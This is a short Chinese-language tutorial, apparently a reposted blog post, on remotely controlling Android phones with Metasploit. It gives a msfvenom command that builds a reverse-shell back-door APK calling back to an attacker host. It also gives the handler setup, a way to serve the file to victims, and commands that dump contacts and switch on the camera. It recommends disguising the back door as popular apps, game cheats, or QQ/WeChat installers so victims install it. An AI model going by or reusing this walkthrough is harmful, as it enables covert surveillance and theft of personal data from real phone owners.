1.Metasploit及其监听模块介绍
二、手机端渗透原理
三、制作恶意软件并获取shell权限
四、实战:远程控制
msf
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
在我们无法安装对方的网络边界的时候,往往需要我们主动出击。比如向目标手机发送一个含有后门的apk软件,或者是一个word文档,pdf文件等。想要达到效果也要利用好社会工程学,来诱骗受害者执行恶意程序。
黑客根据不同的人群进行特定的主动攻击,例如把后门捆绑到一些比较火的软件上,或者捆绑在一些网游外挂或其补丁上,然后传到网络,供他们下载。也可以伪装成QQ或者微信类的安装软件提供给有需求的人群。
msfvenom是msfpayload和msfencode的结合体,可以生成木马程序,并在目标机上执行,在本地监听上线
start
生成安卓后门
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 > shell.apk
使用msf中开启监听
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set lhost 192.168.1.10
- set lport 4444
- run
在kali中apk后门所在目录开启web服务:python -m SimpleHTTPServer
在安卓浏览器里访问网址下载apk
msf中会建立会话
执行命令
sysinfo 查看系统信息
app_list 查看安装app文件
check_root 检测系统root
dump_contacts 下载通讯录信息
webcam_list 获取摄像头信息
webcam_stream 开启摄像头
版权归原作者 人生!? 所有, 如有侵权,请联系我们删除。